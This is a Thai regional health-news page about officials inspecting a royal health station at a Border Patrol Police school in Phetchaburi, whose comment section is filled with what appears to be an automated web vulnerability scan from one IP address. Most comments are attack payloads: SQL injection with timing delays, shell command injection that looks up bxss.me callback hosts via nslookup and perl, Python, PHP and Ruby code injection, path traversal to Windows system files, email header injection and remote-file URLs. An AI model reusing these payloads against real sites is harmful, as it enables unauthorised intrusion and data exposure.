สมัครสมาชิก
เข้าระบบ
ค้นหา

คณะกรรมการมูลนิธิธรรมาภิบาลทางการแพทย์ ตรวจความคืบหน้าการก่อนสร้างสุขศษลาพระราชทาน

หมวดหมู่ ข่าวประชาสัมพันธ์, เขตสุขภาพ 5, โดย admin, วันที่ 9 กรกฎาคม 62 / อ่าน : 2,847พลตำรวจตรีปิยะ ต๊ะวิชับ รองผู้บัญชาการตำรวจตระเวณชายแดน (รองผบช.ตชด.) ร่วมกับ พลอากาศตรี นายแพทย์ อิทธิพร คณะเจริญ เลขาธิการแพทยสภา , พญ. อภิรมย์ เชตภูติ คณะกรรมการมูลนิธิธรรมาภิบาลทางการแพทย์ ตรวจความคืบหน้าการก่อสร้างสุขศาลาพระราชทาน ณ โรงเรียนตำรวจตระเวณชายแดน (ตชด.) บ้านโป่งลึก อ.แก่งกระจาน จ.เพชรบุรี เมื่อวันที่ 26 กุมภาพันธ์ 2562
Facebook Twitter Google+

แสดงความเห็น

20
1 ก.พ. 65 19:26:08 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:30:32 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:32:42 IP 116.204.211.23 โดย : pHqghUme
20
1 ก.พ. 65 19:32:43 IP 116.204.211.23 โดย : pHqghUme
12ypeCgO
1 ก.พ. 65 19:33:17 IP 116.204.211.23 โดย : pHqghUme
20
1 ก.พ. 65 19:33:18 IP 116.204.211.23 โดย : 1tAzMM7xO
1yHL2SSSO
1 ก.พ. 65 19:33:18 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:33:19 IP 116.204.211.23 โดย : 1g6M5ozEO
555
1 ก.พ. 65 19:33:19 IP 116.204.211.23 โดย : pHqghUme
20
1 ก.พ. 65 19:34:20 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:34:21 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:34:43 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:35:25 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:35:26 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:35:43 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:35:43 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:36:25 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:36:25 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:36:26 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:36:26 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:36:28 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:36:30 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:36:31 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:36:42 IP 116.204.211.23 โดย : pHqghUme
response.write(9436451*9656564)
1 ก.พ. 65 19:36:42 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:36:43 IP 116.204.211.23 โดย : pHqghUme
'+response.write(9436451*9656564)+'
1 ก.พ. 65 19:36:44 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:36:44 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:36:45 IP 116.204.211.23 โดย : pHqghUme
"+response.write(9436451*9656564)+"
1 ก.พ. 65 19:36:45 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:36:45 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:37:07 IP 116.204.211.23 โดย : response.write(9849188*9337648)
555
1 ก.พ. 65 19:37:07 IP 116.204.211.23 โดย : '+response.write(9849188*9337648)+'
555
1 ก.พ. 65 19:37:08 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:37:09 IP 116.204.211.23 โดย : pHqghUme
555'>">
1 ก.พ. 65 19:37:09 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:37:09 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:37:10 IP 116.204.211.23 โดย : pHqghUme'>">
/../../../../../../../../../../windows/system32/BITSADMIN.exe
1 ก.พ. 65 19:37:13 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:37:13 IP 116.204.211.23 โดย : "+response.write(9849188*9337648)+"
555
1 ก.พ. 65 19:37:13 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:37:14 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:37:31 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:37:31 IP 116.204.211.23 โดย : /../../../../../../../../../../windows/system32/BI
555
1 ก.พ. 65 19:37:35 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:37:36 IP 116.204.211.23 โดย : pHqghUme
UzzXu0p8
1 ก.พ. 65 19:37:37 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:38:30 IP 116.204.211.23 โดย : RIb4rpEY
555
1 ก.พ. 65 19:38:31 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:38:55 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:39:30 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:41:28 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:41:28 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:41:29 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:41:29 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:41:30 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:41:50 IP 116.204.211.23 โดย : pHqghUme
555 bcc:009247.1716-5032.1716.32402.19024.2@bxss.me
1 ก.พ. 65 19:42:10 IP 116.204.211.23 โดย : pHqghUme
to@example.com> bcc:009247.1716-5033.1716.32402.19024.2@bxss.me
1 ก.พ. 65 19:42:11 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:42:11 IP 116.204.211.23 โดย : pHqghUme
1 ก.พ. 65 19:42:32 IP 116.204.211.23 โดย : pHqghUme
12345'"\'\");|]*{ <>?''????
1 ก.พ. 65 19:42:32 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:42:33 IP 116.204.211.23 โดย : pHqghUme bcc:009247.1716-5034.1716.32402.19024.2@b
555
1 ก.พ. 65 19:42:33 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:42:53 IP 116.204.211.23 โดย : to@example.com> bcc:009247.1716-5035.1716.32402.1
555
1 ก.พ. 65 19:42:54 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:43:34 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:43:35 IP 116.204.211.23 โดย :
555
1 ก.พ. 65 19:43:50 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:43:51 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:43:51 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:43:55 IP 116.204.211.23 โดย : 12345'"\'\");|]*{ <>?''????
555
1 ก.พ. 65 19:44:19 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:44:19 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:44:42 IP 116.204.211.23 โดย : pHqghUme
${10000147+9999048}
1 ก.พ. 65 19:44:52 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:45:02 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:45:43 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:45:44 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:45:51 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:46:24 IP 116.204.211.23 โดย : ${9999247+10000204}
555
1 ก.พ. 65 19:46:25 IP 116.204.211.23 โดย : VXFiWlh0NVQ=
555
1 ก.พ. 65 19:46:45 IP 116.204.211.23 โดย : pHqghUme
echo qhyjjz$()\ bcnhbs\nz^xyu||a #' &echo qhyjjz$()\ bcnhbs\nz^xyu||a #|" &echo qhyjjz$()\ bcnhbs\nz^xyu||a #
1 ก.พ. 65 19:46:46 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:46:46 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:46:47 IP 116.204.211.23 โดย : pHqghUme
&echo ndbujw$()\ ljzask\nz^xyu||a #' &echo ndbujw$()\ ljzask\nz^xyu||a #|" &echo ndbujw$()\ ljzask\nz^xyu||a #
1 ก.พ. 65 19:46:47 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:46:48 IP 116.204.211.23 โดย : pHqghUme
|echo vycuzs$()\ ymunrc\nz^xyu||a #' |echo vycuzs$()\ ymunrc\nz^xyu||a #|" |echo vycuzs$()\ ymunrc\nz^xyu||a #
1 ก.พ. 65 19:46:48 IP 116.204.211.23 โดย : pHqghUme
(nslookup hitdqeampaqgn2ba3e.bxss.me||perl -e "gethostbyname('hitdqeampaqgn2ba3e.bxss.me')")
1 ก.พ. 65 19:46:48 IP 116.204.211.23 โดย : pHqghUme
$(nslookup hitgsybehrpcy6eb04.bxss.me||perl -e "gethostbyname('hitgsybehrpcy6eb04.bxss.me')")
1 ก.พ. 65 19:46:51 IP 116.204.211.23 โดย : pHqghUme
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
1 ก.พ. 65 19:46:52 IP 116.204.211.23 โดย : pHqghUme
1some_inexistent_file_with_long_name.jpg
1 ก.พ. 65 19:46:53 IP 116.204.211.23 โดย : pHqghUme
&(nslookup hitdvevhtuxhae0136.bxss.me||perl -e "gethostbyname('hitdvevhtuxhae0136.bxss.me')")&'\"`0&(nslookup hitdvevhtuxhae0136.bxss.me||perl -e "gethostbyname('hitdvevhtuxhae0136.bxss.me')")&`'
1 ก.พ. 65 19:46:53 IP 116.204.211.23 โดย : pHqghUme
Http://bxss.me/t/fit.txt
1 ก.พ. 65 19:47:08 IP 116.204.211.23 โดย : pHqghUme
|(nslookup hitphdnudqxqt98d20.bxss.me||perl -e "gethostbyname('hitphdnudqxqt98d20.bxss.me')")
1 ก.พ. 65 19:47:09 IP 116.204.211.23 โดย : pHqghUme
http://bxss.me/t/fit.txt?.jpg
1 ก.พ. 65 19:47:10 IP 116.204.211.23 โดย : pHqghUme
bxss.me
1 ก.พ. 65 19:47:11 IP 116.204.211.23 โดย : pHqghUme
`(nslookup hitkuteqtokmue7348.bxss.me||perl -e "gethostbyname('hitkuteqtokmue7348.bxss.me')")`
1 ก.พ. 65 19:47:11 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:47:11 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:47:12 IP 116.204.211.23 โดย : http://some-inexistent-website.acu/some_inexistent
555
1 ก.พ. 65 19:47:14 IP 116.204.211.23 โดย : 1some_inexistent_file_with_long_name.jpg
555
1 ก.พ. 65 19:47:14 IP 116.204.211.23 โดย : Http://bxss.me/t/fit.txt
555
1 ก.พ. 65 19:47:34 IP 116.204.211.23 โดย : http://bxss.me/t/fit.txt?.jpg
555&n991703=v929109
1 ก.พ. 65 19:47:35 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:47:35 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:47:51 IP 116.204.211.23 โดย : pHqghUme&n975990=v989481
;(nslookup hitosrkvzrlzh9fbda.bxss.me||perl -e "gethostbyname('hitosrkvzrlzh9fbda.bxss.me')")|(nslookup hitosrkvzrlzh9fbda.bxss.me||perl -e "gethostbyname('hitosrkvzrlzh9fbda.bxss.me')")&(nslookup hitosrkvzrlzh9fbda.bxss.me||perl -e "gethostbyname('hitosrkvzrlzh9fbda.bxss.me')")
1 ก.พ. 65 19:47:52 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:47:56 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:47:56 IP 116.204.211.23 โดย : bxss.me
555
1 ก.พ. 65 19:47:57 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:47:58 IP 116.204.211.23 โดย : echo zfjimz$()\ cqgbxh\nz^xyu||a #' &echo zfjimz$(
20
1 ก.พ. 65 19:47:58 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:47:59 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:48:00 IP 116.204.211.23 โดย : &echo tfelnp$()\ ynktqc\nz^xyu||a #' &echo tfelnp$
20
1 ก.พ. 65 19:48:01 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:48:01 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:48:02 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:48:06 IP 116.204.211.23 โดย : |echo kfcrns$()\ vnkwqc\nz^xyu||a #' |echo kfcrns$
555
1 ก.พ. 65 19:48:07 IP 116.204.211.23 โดย : (nslookup hitqpaitbsxdif908e.bxss.me||perl -e "get
20
1 ก.พ. 65 19:48:08 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:48:10 IP 116.204.211.23 โดย : $(nslookup hitqjdusbaqtd21c66.bxss.me||perl -e "ge
20
1 ก.พ. 65 19:48:12 IP 116.204.211.23 โดย : pHqghUme
agOLjRyS
1 ก.พ. 65 19:48:13 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:48:13 IP 116.204.211.23 โดย : &(nslookup hitlqrvficxhb617ea.bxss.me||perl -e "ge
555
1 ก.พ. 65 19:48:14 IP 116.204.211.23 โดย : |(nslookup hitmujcomqqmt76645.bxss.me||perl -e "ge
)
1 ก.พ. 65 19:48:15 IP 116.204.211.23 โดย : pHqghUme
-1 OR 2+91-91-1=0+0+0+1 --
1 ก.พ. 65 19:48:15 IP 116.204.211.23 โดย : pHqghUme
'"()
1 ก.พ. 65 19:48:15 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:48:36 IP 116.204.211.23 โดย : `(nslookup hitrcgylzdzui97eb1.bxss.me||perl -e "ge
555
1 ก.พ. 65 19:48:36 IP 116.204.211.23 โดย : '"()
555
1 ก.พ. 65 19:48:37 IP 116.204.211.23 โดย : pHqghUme
!(()&&!|*|*|
1 ก.พ. 65 19:48:37 IP 116.204.211.23 โดย : pHqghUme
-1 OR 3+91-91-1=0+0+0+1 --
1 ก.พ. 65 19:48:37 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:48:39 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:48:39 IP 116.204.211.23 โดย : ;(nslookup hitckhsdqtdjqcbee3.bxss.me||perl -e "ge
-1 OR 2+485-485-1=0+0+0+1
1 ก.พ. 65 19:48:40 IP 116.204.211.23 โดย : pHqghUme
-1 OR 3+485-485-1=0+0+0+1
1 ก.พ. 65 19:48:40 IP 116.204.211.23 โดย : pHqghUme
^(#$!@#$)(()))******
1 ก.พ. 65 19:48:41 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:48:42 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:48:42 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:48:50 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:48:51 IP 116.204.211.23 โดย : )
555
1 ก.พ. 65 19:48:51 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:48:52 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:48:52 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:48:53 IP 116.204.211.23 โดย : !(()&&!|*|*|
-1' OR 2+320-320-1=0+0+0+1 --
1 ก.พ. 65 19:49:02 IP 116.204.211.23 โดย : pHqghUme
-1' OR 3+320-320-1=0+0+0+1 --
1 ก.พ. 65 19:49:03 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:49:03 IP 116.204.211.23 โดย : ^(#$!@#$)(()))******
555
1 ก.พ. 65 19:49:04 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:49:05 IP 116.204.211.23 โดย : pHqghUme
-1' OR 2+46-46-1=0+0+0+1 or 'cFuh4LDS'='
1 ก.พ. 65 19:49:05 IP 116.204.211.23 โดย : pHqghUme
'.gethostbyname(lc('hittz'.'ccdpnzoh4eb92.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(121).chr(82).chr(103).chr(85).'
1 ก.พ. 65 19:49:05 IP 116.204.211.23 โดย : pHqghUme
-1' OR 3+46-46-1=0+0+0+1 or 'cFuh4LDS'='
1 ก.พ. 65 19:49:06 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:49:07 IP 116.204.211.23 โดย : pHqghUme
".gethostbyname(lc("hitzi"."zpyaumdk92a7b.bxss.me."))."A".chr(67).chr(hex("58")).chr(104).chr(87).chr(107).chr(75)."
1 ก.พ. 65 19:49:51 IP 116.204.211.23 โดย : pHqghUme
str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitwiberwpmpif1f1a.'+'bxss.me')
1 ก.พ. 65 19:49:51 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:50:25 IP 116.204.211.23 โดย : '.gethostbyname(lc('hitfh'.'apwuyzzj2d157.bxss.me.
'+str(__import__("time").sleep(9))+__import__("socket").gethostbyname("hitwiberwpmpif1f1a."+"bxss.me")+'
1 ก.พ. 65 19:50:26 IP 116.204.211.23 โดย : pHqghUme
"+str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitwiberwpmpif1f1a.'+'bxss.me')+"
1 ก.พ. 65 19:50:48 IP 116.204.211.23 โดย : pHqghUme
if(now()=sysdate(),sleep(15),0)
1 ก.พ. 65 19:50:48 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:50:48 IP 116.204.211.23 โดย : str(__import__('time').sleep(9))+__import__('socke
HttP://bxss.me/t/xss.html?%00
1 ก.พ. 65 19:50:49 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:50:49 IP 116.204.211.23 โดย : pHqghUme
bxss.me/t/xss.html?%00
1 ก.พ. 65 19:50:52 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:50:52 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:50:53 IP 116.204.211.23 โดย : ".gethostbyname(lc("hitzw"."fzyjgytt5d21d.bxss.me.
555
1 ก.พ. 65 19:50:56 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:50:56 IP 116.204.211.23 โดย : '+str(__import__("time").sleep(9))+__import__("soc
555
1 ก.พ. 65 19:51:09 IP 116.204.211.23 โดย : "+str(__import__('time').sleep(9))+__import__('soc
555
1 ก.พ. 65 19:51:09 IP 116.204.211.23 โดย : HttP://bxss.me/t/xss.html?%00
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
1 ก.พ. 65 19:51:17 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:51:19 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:51:19 IP 116.204.211.23 โดย : bxss.me/t/xss.html?%00
555
1 ก.พ. 65 19:51:19 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:51:20 IP 116.204.211.23 โดย : pHqghUme
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
1 ก.พ. 65 19:51:42 IP 116.204.211.23 โดย : pHqghUme
';print(md5(31337));$a='
1 ก.พ. 65 19:51:43 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:51:43 IP 116.204.211.23 โดย : pHqghUme
";print(md5(31337));$a="
1 ก.พ. 65 19:51:44 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:51:44 IP 116.204.211.23 โดย : pHqghUme
"+"A".concat(70-3).concat(22*4).concat(116).concat(66).concat(107).concat(65)+(require"socket" Socket.gethostbyname("hitnv"+"dkdiypys8c15e.bxss.me.")[3].to_s)+"
1 ก.พ. 65 19:51:45 IP 116.204.211.23 โดย : pHqghUme
http://hitkqggpqortj.bxss.me/
1 ก.พ. 65 19:51:45 IP 116.204.211.23 โดย : pHqghUme
${@print(md5(31337))}
1 ก.พ. 65 19:51:46 IP 116.204.211.23 โดย : pHqghUme
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
1 ก.พ. 65 19:51:47 IP 116.204.211.23 โดย : pHqghUme
${@print(md5(31337))}\
1 ก.พ. 65 19:52:07 IP 116.204.211.23 โดย : pHqghUme
submit
1 ก.พ. 65 19:52:07 IP 116.204.211.23 โดย : pHqghUme
'.print(md5(31337)).'
1 ก.พ. 65 19:52:08 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:52:08 IP 116.204.211.23 โดย : http://hitdgqskcryvm.bxss.me/
'+'A'.concat(70-3).concat(22*4).concat(119).concat(68).concat(120).concat(65)+(require'socket' Socket.gethostbyname('hitpl'+'mowmwgxla8154.bxss.me.')[3].to_s)+'
1 ก.พ. 65 19:52:09 IP 116.204.211.23 โดย : pHqghUme
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
1 ก.พ. 65 19:52:09 IP 116.204.211.23 โดย : pHqghUme
submit
1 ก.พ. 65 19:52:30 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:52:30 IP 116.204.211.23 โดย : "+"A".concat(70-3).concat(22*4).concat(109).concat
555
1 ก.พ. 65 19:52:30 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:52:33 IP 116.204.211.23 โดย : ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'))
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
1 ก.พ. 65 19:52:33 IP 116.204.211.23 โดย : pHqghUme
submit/.
1 ก.พ. 65 19:52:34 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:52:35 IP 116.204.211.23 โดย : '+'A'.concat(70-3).concat(22*4).concat(104).concat
555
1 ก.พ. 65 19:52:55 IP 116.204.211.23 โดย : ';print(md5(31337));$a='
555
1 ก.พ. 65 19:52:55 IP 116.204.211.23 โดย : ))))))))))))))))))))))))))))))))))))))))))))))))))
555
1 ก.พ. 65 19:52:55 IP 116.204.211.23 โดย : submit
555
1 ก.พ. 65 19:53:07 IP 116.204.211.23 โดย : submit
555
1 ก.พ. 65 19:53:07 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:53:17 IP 116.204.211.23 โดย : submit/.
/xfs.bxss.me
1 ก.พ. 65 19:53:37 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:53:37 IP 116.204.211.23 โดย : ";print(md5(31337));$a="
555
1 ก.พ. 65 19:53:38 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:53:39 IP 116.204.211.23 โดย : ${@print(md5(31337))}
957329
1 ก.พ. 65 19:53:40 IP 116.204.211.23 โดย : pHqghUme
http://xfs.bxss.me
1 ก.พ. 65 19:53:40 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:53:40 IP 116.204.211.23 โดย : ${@print(md5(31337))}\
555
1 ก.พ. 65 19:53:41 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:53:41 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:54:01 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:54:02 IP 116.204.211.23 โดย : '.print(md5(31337)).'
555
1 ก.พ. 65 19:54:03 IP 116.204.211.23 โดย : pHqghUme
555
1 ก.พ. 65 19:54:03 IP 116.204.211.23 โดย : pHqghUme
'"
1 ก.พ. 65 19:54:06 IP 116.204.211.23 โดย : pHqghUme
//xfs.bxss.me
1 ก.พ. 65 19:54:23 IP 116.204.211.23 โดย : pHqghUme